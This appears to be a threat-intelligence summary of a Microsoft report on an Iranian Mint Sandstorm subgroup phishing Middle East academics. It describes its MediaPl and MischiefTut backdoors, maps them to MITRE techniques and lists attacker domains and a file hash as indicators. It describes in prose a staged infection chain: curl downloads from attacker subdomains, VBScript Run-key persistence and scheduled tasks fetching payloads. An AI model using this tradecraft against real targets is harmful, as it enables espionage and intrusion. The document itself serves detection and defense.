Microsoft observed a technically mature Mint Sandstorm (PHOSPHORUS) subgroup targeting high-profile academics and researchers involved in Middle Eastern affairs across Belgium, France, Gaza, Israel, the UK, and the US, using bespoke phishing lures and social engineering. The campaign introduced new post-intrusion tradecraft, including a custom backdoor named MediaPl and additional backdoors like MischiefTut, with attackers sometimes leveraging legitimate but compromised accounts to increase credibility. #MintSandstorm #MediaPl #MischiefTut #APT35 #CharmingKitten #IRGC #IsraelHamasWar
Keypoints
- Targets are high-profile individuals (journalists, researchers, professors) with insights on security and policy issues of interest to Tehran.
- Attackers used bespoke phishing lures and social engineering, sometimes using compromised accounts to impersonate targets.
- Delivery follows a staged chain: malicious domain links leading to archives that deliver weaponized files, including .pdf.lnk and .vbs scripts.
- A new custom backdoor, MediaPl, and another backdoor, MischiefTut, were observed, with MediaPl masquerading as Windows Media Player and using encrypted C2 communications.
- Persistence techniques include VBScript in Run keys and scheduled tasks to fetch payloads from attacker-controlled domains.
- MITRE-relevant behaviors include spearphishing, tool transfer via curl, and PowerShell/VBScript-based payloads.
MITRE Techniques
- [T1566.003] Spearphishing via Service β The threat actor used legitimate but compromised email accounts belonging to the individuals they sought to impersonate. βIn some cases, the threat actor used legitimate but compromised email accounts belonging to the individuals they sought to impersonate.β
- [T1566.002] Spearphishing Link β Follow-up messages directed targets to sites such as cloud-document-edit.onrender.com, a domain hosting a RAR archive (.rar) file that targets were asked to review.
- [T1105] Ingress Tool Transfer β The curl command was used to download a series of malicious files from attacker-controlled subdomains. βa curl command to retrieve a series of malicious files from attacker-controlled subdomains of glitch.me and supabase.co.β
- [T1059.001] PowerShell β MischiefTut is a custom backdoor implemented in PowerShell with a set of basic capabilities.
- [T1059.005] VBScript β Persistence.vbs is used to persist and can add a file to the CurrentVersionRun registry key.
- [T1547.001] Run Keys / Startup Folder β Persistence via CurrentVersionRun using a.vbs.
- [T1053.005] Scheduled Task β Created to reach out to attacker-controlled supabase.co domain and download a .txt file.
- [T1036] Masquerading β MediaPl is configured to masquerade as Windows Media Player.
Indicators of Compromise
- [Domains] Targeting domains observed β east-healthy-dress.glitch.me, coral-polydactyl-dragonfruit.glitch.me, kwhfibejjyxregxmnpcs.supabase.co, epibvgvoszemkwjnplyc.supabase.co, ndrrftqrlblfecpupppp.supabase.co, cloud-document-edit.onrender.com
- [Files] MediaPl.dll β SHA-256: f2dec56acef275a0e987844e98afcc44bf8b83b4661e83f89c6a2a72c5811d5f; documentLoger.txt